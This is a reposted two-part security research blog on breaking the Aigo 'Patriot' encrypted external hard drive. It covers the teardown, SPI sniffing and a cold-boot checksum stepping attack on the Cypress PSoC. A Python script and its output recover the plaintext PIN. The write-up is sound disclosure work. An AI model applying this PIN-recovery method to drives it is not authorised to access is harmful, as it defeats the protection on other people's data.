0075: 55 fa 01  mov   [0fah],001h
0078: 4f        mov   X,SP
0079: 5b        mov   A,X
007a: 01 03     add   A,003h
007c: 53 f9     mov   [0f9h],A
007e: 55 f8 3a  mov   [0f8h],03ah
0081: 50 06     mov   A,006h
0083: 00        ssc
[...]
0122: 18        pop   A
0123: 71 10     or    F,010h
0125: 43 e3 10  or    reg[VLT_CR],010h
0128: 70 00     and   F,000h ; Paging mode changed from 3 to 0
012a: ef 62     jacc  008dh
012c: e0 00     jacc  012dh
012e: 71 10     or    F,010h
0130: 62 e0 02  mov   reg[OSC_CR0],002h
0133: 70 ef     and   F,0efh
0135: 62 e2 00  mov   reg[INT_VC],000h
0138: 7c 19 30  lcall 1930h
013b: 8f ff     jmp   013bh
013d: 50 08     mov   A,008h
013f: 7f        ret

It looks good !

Locating the PIN address

Now that we can read the checksum at arbitrary points in time, we can check easily if and where it changes after:

  • entering a wrong PIN
  • changing the PIN

First, to locate the approximate location, I dumped the checksum in steps for 10ms after reset. Then I entered a wrong PIN and did the same.

The results were not very nice as there’s a lot of variation, but it appeared that the checksum changes between 120000µs and 140000µs of delay. Which was actually completely false and an artefact of delayMicrosecondsdoing non-sense when called with 0.

Then, after losing about 3 hours, I remembered that the SROM’s CheckSum syscall has an argument that allows to specify the number of blocks to checksum ! So we can easily locate the PIN and “bad PIN” counter down to a 64-byte block.

My initial runs gave:

No bad PIN          |   14 tries remaining  |   13 tries remaining
                    |                       |
block 125 : 0x47E2  |   block 125 : 0x47E2  |   block 125 : 0x47E2
block 126 : 0x6385  |   block 126 : 0x634F  |   block 126 : 0x6324
block 127 : 0x6385  |   block 127 : 0x634F  |   block 127 : 0x6324
block 128 : 0x82BC  |   block 128 : 0x8286  |   block 128 : 0x825B

Then I changed the PIN from “123456” to “1234567”, and I got:

No bad try            14 tries remaining
block 125 : 0x47E2    block 125 : 0x47E2
block 126 : 0x63BE    block 126 : 0x6355
block 127 : 0x63BE    block 127 : 0x6355
block 128 : 0x82F5    block 128 : 0x828C

So both the PIN and “bad PIN” counter seem to be stored in block 126.

Dumping block 126

Block 126 should be about 125x64x18 = 144000µs after the start of the checksum. So make sure, I looked for checksum 0x47E2 in my full dump, and it looked more or less correct.

Then, after dumping lots of imprecise (because of timing) data, manually fixing the results and comparing flash values (by staring at them), I finally got the following bytes at delay 145527µs:

PIN          Flash content
1234567      2526272021222319141402
123456       2526272021221919141402
998877       2d2d2c2c23231914141402
0987654      242d2c2322212019141402
123456789    252627202122232c2d1902

It is quite obvious that the PIN is stored directly in plaintext ! The values are not ASCII or raw values but probably reflect the readings from the capacitive keyboard.

Finally, I did some other tests to find where the “bad PIN” counter is, and found this :

Delay  CSUM
145996 56E5 (old: 56E2, val: 03)
146020 571B (old: 56E5, val: 36)
146045 5759 (old: 571B, val: 3E)
146061 57F2 (old: 5759, val: 99)
146083 58F1 (old: 57F2, val: FF) <<---- here
146100 58F2 (old: 58F1, val: 01)

0xFF means “15 tries” and it gets decremented with each bad PIN entered.

Recovering the PIN

Putting everything together, my ugly code for recovering the PIN is:

def dump_pin():
    pin_map = {0x24: "0", 0x25: "1", 0x26: "2", 0x27:"3", 0x20: "4", 0x21: "5",
               0x22: "6", 0x23: "7", 0x2c: "8", 0x2d: "9"}
    last_csum = 0
    pin_bytes = []
    for delay in range(145495, 145719, 16):
        csum = csum_at(delay, 1)
        byte = (csum-last_csum)&0xFF
        print "%05d %04x (%04x) => %02x" % (delay, csum, last_csum, byte)
        pin_bytes.append(byte)
        last_csum = csum
    print "PIN: ",
    for i in range(0, len(pin_bytes)):
        if pin_bytes[i] in pin_map:
            print pin_map[pin_bytes[i]],
    print

Which outputs:

$ ./psoc.py 
syncing:  KO  OK
Resetting PSoC:  KO  Resetting PSoC:  KO  Resetting PSoC:  OK
145495 53e2 (0000) => e2
145511 5407 (53e2) => 25
145527 542d (5407) => 26
145543 5454 (542d) => 27
145559 5474 (5454) => 20
145575 5495 (5474) => 21
145591 54b7 (5495) => 22
145607 54da (54b7) => 23
145623 5506 (54da) => 2c
145639 5506 (5506) => 00
145655 5533 (5506) => 2d
145671 554c (5533) => 19
145687 554e (554c) => 02
145703 554e (554e) => 00
PIN:  1 2 3 4 5 6 7 8 9

Great success !

Note that the delay values I used are probably valid only on the specific PSoC I have.

What’s next ?

So, to sum up on the PSoC side in the context of our Aigo HDD:

  • we can read the SRAM even when it’s protected (by design)
  • we can bypass the flash read protection by doing a cold-boot stepping attack and read the PIN directly

However, the attack is a bit painful to mount because of timing issues. We could improve it by:

  • writing a tool to correctly decode the cold-boot attack output
  • using a FPGA for more precise timings (or use Arduino hardware timers)
  • trying another attack: “enter wrong PIN, reset and dump RAM”, hopefully the good PIN will be stored in RAM for comparison. However, it is not easily doable on Arduino, as it outputs 5V while the board runs on 3.3V.

One very cool thing to try would be to use voltage glitching to bypass the read protection. If it can be made to work, it would give us absolutely accurate reads of the flash, instead of having to rely on checksum readings with poor timings.

As the SROM probably reads the flash protection bits in the ReadBlock “syscall”, we can maybe do the same as in described on Dmitry Nedospasov’s blog, a reimplementation of Chris Gerlinsky’s attack presented at REcon Brussels 2017.

One other fun thing would also be to decap the chip and image it to dump the SROM, uncovering undocumented syscalls and maybe vulnerabilities ?

Conclusion

To conclude, the drive’s security is broken, as it relies on a normal (not hardened) micro-controller to store the PIN… and I have not (yet) checked the data encryption part !

What should Aigo have done ? After reviewing a few encrypted HDD models, I did a presentation at SyScan in 2015 which highlights the challenges in designing a secure and usable encrypted external drive and gives a few options to do something better 🙂

Overall, I spent 2 week-ends and a few evenings, so probably around 40 hours from the very beginning (opening the drive) to the end (dumping the PIN), including writing those 2 blog posts. A very fun and interesting journey 😉

Aigo Chinese encrypted HDD − Part 1: taking it apart

Original post by Raphaël Rigo on syscall.eu ( under CC-BY-SA 4.0 )

Introduction

Analyzing and breaking external encrypted HDD has been a “hobby” of mine for quite some time. With my colleagues Joffrey Czarny and Julien Lenoir we looked at several models in the past:

  • Zalman VE-400
  • Zalman ZM-SHE500
  • Zalman ZM-VE500

Here I am going to detail how I had fun with one drive a colleague gave me: the Chinese Aigo “Patriot” SK8671, which follows the classical design for external encrypted HDDs: a LCD for information diplay and a keyboard to enter the PIN.

DISCLAIMER: This research was done on my personal time and is not related to my employer.

Patriot HDD front view with keyboard Patriot HDD package
Enclosure
Packaging

The user must input a password to access data, which is supposedly encrypted.

Note that the options are very limited:

  • the PIN can be changed by pressing F1 before unlocking
  • the PIN must be between 6 and 9 digits
  • there is a wrong PIN counter, which (I think) destroys data when it reaches 15 tries.

In practice, F2, F3 and F4 are useless.

Hardware design

Of course one of the first things we do is tear down everything to identify the various components.

Removing the case is actually boring, with lots of very small screws and plastic to break.

In the end, we get this (note that I soldered the 5 pins header):

disk

Main PCB

The main PCB is pretty simple:

main PCB

Important parts, from top to bottom:

  • connector to the LCD PCB (CN1)
  • beeper (SP1)
  • Pm25LD010 (datasheet) SPI flash (U2)
  • Jmicron JMS539 (datasheet) USB-SATA controller (U1)
  • USB 3 connector (J1)

The SPI flash stores the JMS539 firmware and some settings.

LCD PCB

The LCD PCB is not really interesting:

LCD view

LCD PCB

It has:

  • an unknown LCD character display (with Chinese fonts probably), with serial control
  • a ribbon connector to the keyboard PCB

Keyboard PCB

Things get more interesting when we start to look at the keyboard PCB:

Keyboard PCB, back

Here, on the back we can see the ribbon connector and a Cypress CY8C21434 PSoC 1 microcontroller (I’ll mostly refer to it as “µC” or “PSoC”):CY8C21434

The CY8C21434 is using the M8C instruction set, which is documented in the Assembly Language User Guide.

The product page states it supports CapSense, Cypress’ technology for capacitive keyboards, the technology in use here.

You can see the header I soldered, which is the standard ISSP programming header.

Following wires

It is always useful to get an idea of what’s connected to what. Here the PCB has rather big connectors and using a multimeter in continuity testing mode is enough to identify the connections:

hand drawn schematic

Some help to read this poorly drawn figure:

  • the PSoC is represented as in the datasheet
  • the next connector on the right is the ISSP header, which thankfully matches what we can find online
  • the right most connector is the clip for the ribbon, still on the keyboard PCB
  • the black square contains a drawing of the CN1 connector from the main PCB, where the cable goes to the LCD PCB. P11, P13 and P4 are linked to the PSoC pins 11, 13 and 4 through the LCD PCB.

Attack steps

Now that we know what are the different parts, the basic steps would be the same as for the drives analyzed in previous research :

  • make sure basic encryption functionnality is there
  • find how the encryption keys are generated / stored
  • find out where the PIN is verified

However, in practice I was not really focused on breaking the security but more on having fun. So, I did the following steps instead:

  • dump the SPI flash content
  • try to dump PSoC flash memory (see part 2)
  • start writing the blog post
  • realize that the communications between the Cypress PSoC and the JMS539 actually contains keyboard presses
  • verify that nothing is stored in the SPI when the password is changed
  • be too lazy to reverse the 8051 firmware of the JMS539
  • TBD: finish analyzing the overall security of the drive (in part 3 ?)

Dumping the SPI flash

Dumping the flash is rather easy:

  • connect probes to the CLKMOSIMISO and (optionally) EN pins of the flash
  • sniff the communications using a logic analyzer (I used a Saleae Logic Pro 16)
  • decode the SPI protocol and export the results in CSV
  • use decode_spi.rb to parse the results and get a dump

Note that this works very well with the JMS539 as it loads its whole firmware from flash at boot time.

$ decode_spi.rb boot_spi1.csv dump
0.039776 : WRITE DISABLE
0.039777 : JEDEC READ ID
0.039784 : ID 0x7f 0x9d 0x21
---------------------
0.039788 : READ @ 0x0
0x12,0x42,0x00,0xd3,0x22,0x00,
[...]
$ ls --size --block-size=1 dump
49152 dump
$ sha1sum dump
3d9db0dde7b4aadd2b7705a46b5d04e1a1f3b125  dump

Unfortunately it does not seem obviously useful as:

  • the content did not change after changing the PIN
  • the flash is actually never accessed after boot

So it probably only holds the firmware for the JMicron controller, which embeds a 8051 microcontroller.

Sniffing communications

One way to find which chip is responsible for what is to check communications for interesting timing/content.

As we know, the USB-SATA controller is connected to the screen and the Cypress µC through the CN1 connector and the two ribbons. So, we hook probes to the 3 relevant pins:

  • P4, generic I/O in the datasheet
  • P11, I²C SCL in the datasheet
  • P13, I²C SDA in the datasheet

probes

We then launch Saleae logic analyzer, set the trigger and enter “123456✓” on the keyboard. Which gives us the following view:

Saleae logic analyzer screenshot

You can see 3 differents types of communications:

  • on the P4 channel, some short bursts
  • on P11 and P13, almost continuous exchanges

Zooming on the first P4 burst (blue rectangle in previous picture), we get this :

P4 zoom

You can see here that P4 is almost 70ms of pure regular signal, which could be a clock. However, after spending some time making sense of this, I realized that it was actually a signal for the “beep” that goes off every time a key is touched… So it is not very useful in itself, however, it is a good marker to know when a keypress was registered by the PSoC.

However, we have on extra “beep” in the first picture, which is slightly different: the sound for “wrong pin” !

Going back to our keypresses, when zooming at the end of the beep (see the blue rectangle again), we get:end of beep zoom

Where we have a regular pattern, with a (probable) clock on P11 and data on P13. Note how the pattern changes after the end of the beep. It could be interesting to see what’s going on here.

2-wires protocols are usually SPI or I²C, and the Cypress datasheet says the pins correspond to I²C, which is apparently the case:i2c decoding of '1' keypress

The USB-SATA chipset constantly polls the PSoC to read the key state, which is ‘0’ by default. It then changes to ‘1’ when key ‘1’ was pressed.

The final communication, right after pressing “✓”, is different if a valid PIN is entered. However, for now I have not checked what the actual transmission is and it does not seem that an encryption key is transmitted.

Anyway, see part 2 to read how I did dump the PSoC internal flash.